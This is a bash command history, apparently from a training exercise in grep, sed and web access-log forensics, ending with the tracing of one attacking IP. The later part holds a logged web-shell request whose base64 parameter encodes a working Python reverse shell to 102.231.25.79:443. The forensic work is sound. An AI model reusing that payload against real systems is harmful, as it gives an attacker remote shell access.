  37  wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10k-most-common.txt
   38  ls
   39  rm -rf 10k-most-common.txt 
   40  ls
   41  cd work/
   42  ls
   43  clear
   44  ls
   45  cat ip_check.sh 
   46  clear
   47  wget https://github.com/k4m1ll0/demo/raw/main/accesslog.zip
   48  unzip accesslog.zip
   49  ls
   50  unzip accesslog.zip 
   51  ls
   52  ./ip_check.sh 
   53  ls
   54  wget https://pastebin.com/raw/YB0ATaXa
   55  ls
   56  ./ip_check.sh 
   57  mv YB0ATaXa iplist2.txt
   58  ./ip_check.sh 
   59  ls
   60  cat iplist2.txt 
   61  cat iplist2.txt  | tr '\r' '#'
   62  cat iplist2.txt  | tr '\r' '#' | tr '\n' '@'
   63  cat iplist2.txt  | tr -d '\r
   64  clear
   65  ls -la
   66  cat ip_check.sh 
   67  ls
   68  wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10k-most-common.txt
   69  ls
   70  cat 10k-most-common.txt | grep -E '[0-9]$'
   71  cat 10k-most-common.txt | grep -E '[0-9]$' | wc -l
   72  cat 10k-most-common.txt | grep -E '^[0-9]$' | wc -l
   73  cat 10k-most-common.txt | grep -E '^[0-9]$'
   74  cat 10k-most-common.txt | grep -E '^.b.*[0-9]{3}$'
   75  clear
   76  cat 10k-most-common.txt | grep -E '^.b.*[0-9]{3}$'
   77  sed -i -e 's/\r$//' ip_check.sh 
   78  ./ip_check.sh 
   79  ls -la
   80  cat ip_check.sh 
   81  cat iplist2.txt | ./ip_check.sh 
   82  ls
   83  cat iplist2.txt 
   84  cat iplist2.txt | 
   85  ls
   86  ./ip_check.sh 
   87  vim ip_check.sh 
   88  apt install vim
   89  sudo apt install vim
   90  ls -la
   91  cat iplist2.txt 
   92  vim ip_check.sh 
   93  ./ip_check.sh 
   94  vim ip_check.sh 
   95  ./ip_check.sh 
   96  vim ip_check.sh 
   97  ./ip_check.sh 
   98  vim ip_check.sh 
   99  ./ip_check.sh 
  100  vim ip_check.sh 
  101  ./ip_check.sh 
  102  ls
  103  cat iplist2.txt 
  104  cat iplist2.txt  | tr '#'
  105  cat iplist2.txt  | tr '\r' '#'
  106  cat access.log 
  107  cat access | cut -d ' ' -f 1
  108  clear
  109  cat access.log 
  110  cat access.log | cut -d '[' -f2 | cut -d ':' -f1,2 | uniq -c | sed -e "s/^\ *//g"
  111  cat access.log | cut -d '[' -f2 | cut -d ':' -f1,2 | uniq -c 
  112  cat access.log | cut -d '[' -f2 | cut -d ':' -f1,2 | uniq -c | sed -e "s/^\ *//g"
  113  cat access.log | cut -d '[' -f2 | cut -d ':' -f1,2 | uniq -c | sed -e "s/^\ *//g" | tr ' ' ';'
  114  cat access.log | cut -d '[' -f2 | cut -d ':' -f1,2 | uniq -c | sed -e "s/^\ *//g" | tr ' ' '-'
  115  cat access.log | cut -d '[' -f2 | cut -d ':' -f1,2 | uniq -c | sed -e "s/^\ *//g" | tr ' ' ';'
  116  ls
  117  cd ic/
  118  ls
  119  clear
  120  ls -la
  121  mkdir work2
  122  cd work2/
  123  clear
  124  ls -la
  125  clear
  126  ls -la
  127  wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10k-most-common.txt
  128  clear
  129  ls -la
  130  cat 10k-most-common.txt 
  131  cat 10k-most-common.txt | wc -l
  132  clear
  133  cat 10k-most-common.txt | grep "pass"
  134  cat 10k-most-common.txt | grep -E "^pass"
  135  cat 10k-most-common.txt | grep -E "pass$"
  136  cat 10k-most-common.txt | grep -E "^a*"
  137  cat 10k-most-common.txt | grep -E "^a*" | w -l
  138  cat 10k-most-common.txt | grep -E "^a*" | wc -l
  139  cat 10k-most-common.txt | grep -E "^a+" | wc -l
  140  cat 10k-most-common.txt | grep -E "^a+"
  141  cat 10k-most-common.txt | grep -E "^a.*"
  142  cat 10k-most-common.txt | grep -E "^a+" | wc -l
  143  cat 10k-most-common.txt | grep -E "^a.*" 
  144  cat 10k-most-common.txt | grep -E "^a+" | wc -l
  145  cat 10k-most-common.txt | grep -E "^a.*" 
  146  cat 10k-most-common.txt | grep -E "^a.*" | wc -l
  147  cat 10k-most-common.txt | grep -E "^a.*" 
  148  cat 10k-most-common.txt | grep -E "^.b.*" 
  149  cat 10k-most-common.txt | grep -E "^.b.*" | wc -l 
  150  cat 10k-most-common.txt | grep -E "^.b.*" | head -n 10
  151  cat 10k-most-common.txt | grep -E "^[0-9]a.*" | head -n 10
  152  cat 10k-most-common.txt | grep -E "^[0-9]{2,3}.*"
  153  cat 10k-most-common.txt | grep -E "^[0-9]{2,3}[a-Z"
  154  cat 10k-most-common.txt | grep -E "^[0-9]{2,3}[a-Z]+"
  155  cat 10k-most-common.txt | grep -E "^[0-9]{2,3}[a-Z]*"
  156  cat 10k-most-common.txt | grep -E "^[0-9]{2,3}([a-Z])*"
  157  cat 10k-most-common.txt | grep -E "^([0-9]{2,3})[a-z]+$"
  158  cat 10k-most-common.txt | grep -E "^[^a-z]$" 
  159  cat 10k-most-common.txt | grep -E "^[^a-Z]$" 
  160  cat 10k-most-common.txt | grep -E "^[^a-Z]" 
  161  cat 10k-most-common.txt | grep -E "^[a|b|e]" 
  162  cat 10k-most-common.txt | grep -E "^[abe]" 
  163  cat 10k-most-common.txt | grep -E "^(ab)|(ce)" 
  164  cat 10k-most-common.txt | grep -E "^((ab)|(ce))"  
  165  clear
  166  man grep
  167  cat 10k-most-common.txt | grep -E "^[:digit:]$"
  168  cat 10k-most-common.txt | grep -E "^[:digit:]"
  169  cat 10k-most-common.txt | grep -E "^[[:digit:]]$"
  170  cat 10k-most-common.txt | grep -E "^[[:digit:]]"
  171  clear
  172  cat 10k-most-common.txt | grep -E "[0-9]$" 
  173  clear
  174  cat 10k-most-common.txt | grep -E "[0-9]$" | head -n 10
  175  cat 10k-most-common.txt | grep -E "[0-9]{2}$" | head -n 10
  176  cat 10k-most-common.txt | grep -E "[0-9]{2}$"
  177  cat 10k-most-common.txt | grep -E "[0-9]{2}$" | head -n 10
  178  clear
  179  cat 10k-most-common.txt | grep -E "[0-9]{2}$" | head -n 10
  180  cat 10k-most-common.txt | grep -E "^.b.*[0-9]{3}$" | head -n 10
  181  cat 10k-most-common.txt | grep -E "^.b.*[0-9]{3}$"
  182  clear
  183  cat 10k-most-common.txt | grep -E "^[a-z][^0-9]*"
  184  cat 10k-most-common.txt | grep -E "^[a-z](^[0-9])*"
  185  cat 10k-most-common.txt | grep -E "^([^0-9]*"
  186  cat 10k-most-common.txt | grep -E "^([^0-9])*"
  187  cat 10k-most-common.txt | grep -E "^(^[0-9]+)"
  188  cat 10k-most-common.txt | grep -E "^(^[0-9]*)"
  189  cat 10k-most-common.txt | grep -E "^[a-Z]*"
  190  cat 10k-most-common.txt | grep -E "^[a-z]*"
  191  cat 10k-most-common.txt | grep -E "^[a-Z]+"
  192  cat 10k-most-common.txt | grep -E "^[a-Z]+$"
  193  cat 10k-most-common.txt | grep -E "^(valami)$"  
  194  cat 10k-most-common.txt | grep -E "^[a-z]"  
  195  cat 10k-most-common.txt | grep -E "^[0-9]"  
  196  cat 10k-most-common.txt | grep -E "^(^[0-9])"  
  197  cat 10k-most-common.txt | grep -E "^([^0-9])"  
  198  cat 10k-most-common.txt | grep -E "^([^0-9])+"  
  199  cat 10k-most-common.txt | grep -E "^([^0-9])+$"  
  200  cat 10k-most-common.txt | grep -E "^([^0-9]+)$"  
  201  clear
  202  man grep
  203  ls
  204  clear
  205  ls
  206  wget https://pastebin.com/raw/YB0ATaXa
  207  ls
  208  cat YB0ATaXa 
  209  clear
  210  wget https://pastebin.com/raw/YB0ATaXa
  211  ls
  212  rm -rf YB0ATaXa*
  213  wget https://pastebin.com/raw/YB0ATaXa
  214  clear
  215  cat YB0ATaXa 
  216  clear
  217  #wget https://pastebin.com/raw/YB0ATaXa
  218  cp YB0ATaXa iplist.txt
  219  ls
  220  cat iplist.txt | grep -E "[0-9]\."
  221  cat iplist.txt | grep -E "([0-9]|\.)+"
  222  clear
  223  cat iplist.txt | grep -E "([0-9]|\.)+"
  224  cat iplist.txt | grep -E "^(([0-9]|\.)+)$"
  225  clear
  226  cat iplist.txt | grep -E "^(([0-9]|\.)+)$"
  227  cat iplist.txt | grep -E "^(([0-9]|\.)+)"
  228  cat iplist.txt | grep -E -w "^(([0-9]|\.)+)"
  229  cat iplist.txt | grep -E  "^(([0-9]|\.)+)"
  230  man grep
  231  clear
  232  BYTE="^[0-9]{1,3}$"
  233  cat iplist.txt | grep -E $BYTE
  234  BYTE="^[0-9]{1,3}"
  235  cat iplist.txt | grep -E $BYTE
  236  clear
  237  BYTE="[0-9]{1,3}"
  238  cat iplist.txt | grep -E $BYTE
  239  clear
  240  cat iplist.txt 
  241  cat iplist.txt | grep -E "([0-9]|\.)"
  242  cat iplist.txt | grep -E "^([0-9]|\.)"
  243  cat iplist.txt | grep -E "^([0-9]|\.)+"
  244  cat iplist.txt | grep -E -w "^([0-9]|\.)+"
  245  cat iplist.txt | grep -E - "^([0-9]|\.)+"
  246  cat iplist.txt | grep -E -w "^([0-9]|\.)+"
  247  cat iplist.txt | grep -E -w "^([0-9]\.)+"
  248  cat iplist.txt | grep -E -w "^([0-9]\.)"
  249  cat iplist.txt | grep -E -w "^([0-9.])"
  250  cat iplist.txt | grep -E -w "^([0-9.]+)"
  251  cat iplist.txt | grep -E -w "^([0-9.])$"
  252  cat iplist.txt | grep -E -w "^([0-9\.])$"
  253  cat iplist.txt | grep -E -w "^([0-9\.])"
  254  cat iplist.txt | grep -E -w "^([0-9])"
  255  cat iplist.txt | grep -E -w "^([0-9]{1,3})"
  256  cat iplist.txt | grep -E -w "^([0-9]{1,3})\.[0-9]{1,3}"
  257  cat iplist.txt | grep -E -w "^([0-9]{1,3})\.[0-9]{1,3}\.[0-9]{1,3}"
  258  cat iplist.txt | grep -E -w "^([0-9]{1,3})\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}"
  259  cat iplist.txt | grep -E -w "^([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$"
  260  cat iplist.txt | grep -E -w "^([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})$"
  261  cat iplist.txt | grep -E -w "^([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})"
  262  cat iplist.txt | tr '\r' '#'
  263  cat iplist.txt | tr '\r' '#' | tr '\n' '@'
  264  cat iplist.txt | grep -E -w "^([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})$"
  265  ls
  266  cat iplist.txt | grep -E -w "^([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})"
  267  cat iplist.txt | grep -E -w "^([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})$"
  268  cat iplist.txt | tr '\r' '#'
  269  cat iplist.txt | tr -d '\r'
  270  cat iplist.txt | tr -d '\r' > iplist2.txt
  271  cat iplist2.txt | grep -E -w "^([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})$"
  272  vim ip_check.sh 
  273  ./ip_check.sh 
  274  vim ip_check.sh 
  275  ./ip_check.sh 
  276  vim ip_check.sh 
  277  ./ip_check.sh 
  278  vim ip_check.sh 
  279  ls
  280  cat iplist2.txt | grep -E "([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])"
  281  cat iplist2.txt | grep -E "^([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$"
  282  BYTE="([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])"
  283  cat iplist2.txt | grep -E "$BYTE"
  284  cat iplist2.txt | grep -E "$BYTE\.$BYTE\.$BYTE.\$BYTE"
  285  cat iplist2.txt | grep -E "$BYTE\.$BYTE\.$BYTE\.$BYTE"
  286  cat iplist2.txt | grep -E "^($BYTE\.$BYTE\.$BYTE\.$BYTE)$"
  287  BYTE="([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])"
  288  cat iplist2.txt | grep -E "^($BYTE\.$BYTE\.$BYTE\.$BYTE)$"
  289  cler
  290  clear
  291  vim ip_check.sh 
  292  ./ip_check.sh 
  293  vim ip_check.sh 
  294  ./ip_check.sh 
  295  ./ip_check.sh  | wc -l
  296  clear
  297  BYTE="([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])"
  298  cat iplist2.txt | grep -E "^($BYTE\.$BYTE\.$BYTE\.$BYTE)$"
  299  clear
  300  ls -la
  301  wget https://github.com/k4m1ll0/demo/raw/main/accesslog.zip
  302  unzip accesslog.zip 
  303  ls
  304  wc -l access.log 
  305  ls
  306  clear
  307  ls -la
  308  clear
  309  head -n 10 access.log 
  310  ls
  311  clear
  312  tail -n 10 access.log 
  313  wc -l
  314  cat access.log | wc -l
  315  clear
  316  cat access.log | wc -l
  317  cat access.log | head -n 2
  318  cat access.log | cut -d ' ' -f1
  319  cat access.log | cut -d ' ' -f1 | sort 
  320  cat access.log | cut -d ' ' -f1 | sort | uniq -c
  321  cat access.log | cut -d ' ' -f1 | sort | uniq -c | sed "s/\ //g"
  322  cat access.log | cut -d ' ' -f1 | sort | uniq -c | sed "s/\ /:/g"
  323  cat access.log | cut -d ' ' -f1 | sort | uniq -c | sed "s/^\ +/:/g"
  324  cat access.log | cut -d ' ' -f1 | sort | uniq -c | sed "s/^ +/:/g"
  325  cat access.log | cut -d ' ' -f1 | sort | uniq -c | sed "s/^/:/g"
  326  cat access.log | cut -d ' ' -f1 | sort | uniq -c | sed "s/^(\ )+/:/g"
  327  cat access.log | cut -d ' ' -f1 | sort | uniq -c | tr ' ' '#"
  328  cat access.log | cut -d ' ' -f1 | sort | uniq -c | tr ' ' '#'
  329  cat access.log | cut -d ' ' -f1 | sort | uniq -c | tr ' ' '#' | sed -e "s/#{2,5}//g"
  330  cat access.log | cut -d ' ' -f1 | sort | uniq -c | tr ' ' '#' | sed -e "s/^(#{2})//g"
  331  clear
  332  echo ####348#95.90.235.85
  333  echo '####348#95.90.235.85'
  334  echo '####348#95.90.235.85' | sed "s/#{2,3}//g"
  335  echo '####348#95.90.235.85' | sed -e "s/#{2,3}//g"
  336  echo '####348#95.90.235.85' | trim
  337  sudo apt install trim
  338  sudo apt install gtrim
  339  clear
  340  sudo apt install gtrim
  341  echo '####348#95.90.235.85' | sed -e "s/[[:space:]]*$//"
  342  echo '####348#95.90.235.85' | sed -e 's/[[:space:]]*$//'
  343  echo '####348#95.90.235.85' | sed -e 's/#*$//'
  344  echo '####348#95.90.235.85' | sed -e 's/^#+$//'
  345  echo '####348#95.90.235.85' | sed -e "s/^#+$//g"
  346  echo '####348#95.90.235.85' | sed -e "s/^#+//g"
  347  echo '####348#95.90.235.85' | sed -e "s/#/@/g"
  348  echo '####348#95.90.235.85' | sed -e "s/####//g"
  349  echo '####348#95.90.235.85' | sed -e "s/^#{1,5}//g"
  350  man sed
  351  echo '####348#95.90.235.85' | sed -er "s/^#{1,5}//g"
  352  echo '####348#95.90.235.85' | sed -eR "s/^#{1,5}//g"
  353  man sed
  354  echo '####348#95.90.235.85' | sed -e 's/#{1,3}//g'
  355  echo '####348#95.90.235.85' | sed -e -R 's/#{1,3}//g'
  356  echo '####348#95.90.235.85' | tr '#' '-'
  357  echo '####348#95.90.235.85' | tr '#' '-' | sed 's/^[-]+//g'
  358  echo '####348#95.90.235.85' | tr '#' '-' | sed 's/^-+//g'
  359  echo '####348#95.90.235.85' | tr '#' '-' | sed 's/^-{1}//g'
  360  clear
  361  echo '####348#95.90.235.85' | tr '#' '-' |  sed -r ‘s/\s+//g’
  362  echo '####348#95.90.235.85' | tr '#' '-' |  sed -r 's/\s+//g'
  363  echo '####348#95.90.235.85' | tr '#' ' ' |  sed -r 's/\s+//g'
  364  echo '####348#95.90.235.85' | tr '#' ' ' |  sed -r 's/\s{2,6}//g'
  365  man sed
  366  echo '####348#95.90.235.85' | sed -r 's/#{2,6}//g'
  367  echo '####348#95.90.235.85' | sed -r 's/#{2,6}//g' | tr '#' ';'
  368  cat access.log | cut -d ' ' -f1 | head -n10|
  369  cat access.log | cut -d ' ' -f1 | head -n10 
  370  cat access.log | cut -d ' ' -f1 | head -n10 | sort | uniq -c
  371  cat access.log | cut -d ' ' -f1 | head -n10 | sort | uniq -c | sed -r 's/\s{2,6}//g' 
  372  cat access.log | cut -d ' ' -f1 | head -n10 | sort | uniq -c | sed -r 's/\s{2,6}//g' | tr ' ' ';'
  373  cat access.log | cut -d ' ' -f1 | sort | uniq -c | sed -r 's/\s{2,6}//g' | tr ' ' ';'
  374  cat access.log | cut -d ' ' -f1 | sort | uniq -c | sed -r 's/\s{2,6}//g' | tr ' ' ';' | wc -l
  375  cat access.log | cut -d ' ' -f1 | sort | uniq -c | sed -r 's/\s{2,6}//g' | tr ' ' ';' | sort -rnk1 
  376  cat access.log | cut -d ' ' -f1 | sort | uniq -c | sed -r 's/\s{2,6}//g' | tr ' ' ';' | sort -rnk1  | head -n
  377  cat access.log | cut -d ' ' -f1 | sort | uniq -c | sed -r 's/\s{2,6}//g' | tr ' ' ';' | sort -rnk1  | head -n 10
  378  clear
  379  cat access.log | head -n 1
  380  cat access.log | head -n 10
  381  cat access.log | cut -d ' ' -f4
  382  cat access.log | cut -d ' ' -f5
  383  cat access.log | cut -d ' ' -f6
  384  cat access.log | cut -d ' ' -f6-7
  385  cat access.log | head -n 10
  386  cat access.log | head -n 10 | cut -d ' ' -f7
  387  cat access.log | head -n 10 | cut -d ' ' -f67
  388  cat access.log | head -n 10 | cut -d ' ' -f6,7
  389  cat access.log | cut -d ' ' -f6,7 | sort | uniq -c | sort -rnk1
  390  cat access.log | cut -d ' ' -f6,7 | sort | uniq -c | sort -rnk1 | head -n 10
  391  clear
  392  cat access.log | cut -d ' ' -f6,7 | sort | uniq -c | sort -rnk1 | head -n 10
  393  cat access.log | head -n 10
  394  cat access.log | head -n 10 | cut -d '"' -f2
  395  cat access.log | head -n 10 | cut -d '"' -f2 | cut -d ' ' -f 1 
  396  cat access.log | head -n 10 | cut -d '"' -f2 | cut -d ' ' -f 1 | sort | uniq -c
  397  cat access.log | cut -d '"' -f2 | cut -d ' ' -f 1 | sort | uniq -c
  398  cat access.log | head -n 10
  399  cat access.log | head -n 10 | cut -d '[' -f2
  400  cat access.log | tail -n 10 | cut -d '[' -f2 | 
  401  cat access.log | tail -n 10 | cut -d '[' -f2
  402  cat access.log | tail -n 10 | cut -d '[' -f2 | cut -d ':' -f1,2
  403  cat access.log | cut -d '[' -f2 | cut -d ':' -f1,2
  404  cat access.log | cut -d '[' -f2 | cut -d ':' -f1,2 | wc -l
  405  cat access.log | cut -d '[' -f2 | cut -d ':' -f1,2 | sort | uniq | 
  406  cat access.log | cut -d '[' -f2 | cut -d ':' -f1,2 | sort | uniq 
  407  cat access.log | cut -d '[' -f2 | cut -d ':' -f1,2 | sort | uniq  | wc -l
  408  cat access.log | cut -d '[' -f2 | cut -d ':' -f1,2 | sort | uniq -c
  409  cat access.log | cut -d '[' -f2 | cut -d ':' -f1,2 | sort | uniq -c | sed -r 's/\s{2,5}//g'
  410  cat access.log | cut -d '[' -f2 | cut -d ':' -f1,2 | sort | uniq -c | sed -r 's/\s{2,5}//g' | tr ' ' ';'
  411  clear
  412  cat access.log| cut -d" " -f1 | sort | uniq -c | sort -rnk1 | head -n 20
  413  cat access.log| cut -d" " -f1 | sort | uniq -c | sort -nk1 |
  414  cat access.log| cut -d" " -f1 | sort | uniq -c | sort -nk1 
  415  cat access.log | grep 79.140.150.66
  416  cat access.log | grep 79.140.150.66 | wc -l
  417  cat access.log | grep 79.140.150.66 | cut -d '"' -f1
  418  cat access.log | grep 79.140.150.66 | cut -d '"' -f2
  419  cat access.log | grep 79.140.150.66 | cut -d '"' -f2 | sort | uniq -c
  420  cat access.log | grep 79.140.150.66 | cut -d '"' -f2 | sort | uniq -c | sort -rnk1 
  421  cat access.log | grep 79.140.150.66 | cut -d '"' -f2 | sort | uniq -c | sort -rnk1  | head -n 10
  422  cat access.log | grep 79.140.150.66 | cut -d '"' -f2 | sort | uniq -c | sort -rnk1  | head -n 20
  423  cat access.log | grep 79.140.150.66 | cut -d '"' -f2 | sort | uniq -c | sort -rnk1  | head -n 10
  424  cat access.log | cut -d '[' -f2 | cut -d ':' -f1,2 | sort | uniq -c | sed -r 's/\s{2,5}//g' | tr ' ' ';'
  425  cat access.log| cut -d" " -f1 | sort | uniq -c | sort -nk1 
  426  cat access.log| cut -d" " -f1 | sort | uniq -c | sort -rnk1 | head -n 100 
  427  cat access.log| cut -d" " -f1 | sort | uniq -c | sort -rnk1 | head -n 10
  428  clear
  429  cat access.log | grep 100.20.156.171 | cut -d '"' -f2 | sort | uniq -c | sort -rnk1  | head -n 10
  430  cat access.log| cut -d" " -f1 | sort | uniq -c | sort -rnk1 | head -n 10
  431  cat access.log | grep 37.76.37.190| cut -d '"' -f2 | sort | uniq -c | sort -rnk1  | head -n 10
  432  cat access.log | grep 102.231.25.79| cut -d '"' -f2 | sort | uniq -c | sort -rnk1  | head -n 10
  433  cat access.log | grep 102.231.25.79 | grep POST
  434  cat access.log | grep 102.231.25.79 | grep POST | cut -d ' ' -f4-5
  435  cat access.log | grep 102.231.25.79 | grep POST | cut -d ' ' -f4-6
  436  cat access.log | grep 102.231.25.79 | grep POST | cut -d ' ' -f4-7
  437  cat access.log | grep 102.231.25.79 | grep POST | cut -d ' ' -f4-8
  438  cat access.log | grep 102.231.25.79 | grep POST | cut -d ' ' -f4-9     
  439  echo -n '90c21f607b9f43312b055e614c2c9053' | base64
  440  echo -n '90c21f607b9f43312b055e614c2c9053' | base64 -d
  441  cat access.log | grep 102.231.25.79
  442  clear
  443  cat access.log | grep "90c21f607b9f43312b055e614c2c9053.phph?CMD=cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAyLjIzMS4yNS43OSIsNDQzKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKTsn"
  444  echo '
Hl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAyLjIzMS4yNS43OSIsNDQzKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKTsn' 
  445  echo '
Hl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAyLjIzMS4yNS43OSIsNDQzKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKTsn' | base64 -d
  446  echo -n '
Hl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAyLjIzMS4yNS43OSIsNDQzKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKTsn' | base64 -d
  447  cat access.log | grep 102.231.25.79
  448  cat access.log | grep 102.231.25.79 > attack.txt
  449  ls
  450  cat attack.txt 
  451  lear
  452  clear
  453  echo -n 'cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAyLjIzMS4yNS43OSIsNDQzKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKTsn' | base64 -d
  454  cat attack.txt 
  455  cat attack.txt  | head -n 10
  456  cat attack.txt  | tail -n 10
  457  cat attack.txt  | tail -n 10 | cut -d ' ' f1-8
  458  cat attack.txt  | tail -n 10 | cut -d ' ' -f1-8
  459  cat attack.txt  | tail -n 10 | cut -d ' ' -f1-9
  460  history 
  461  history > command.txt
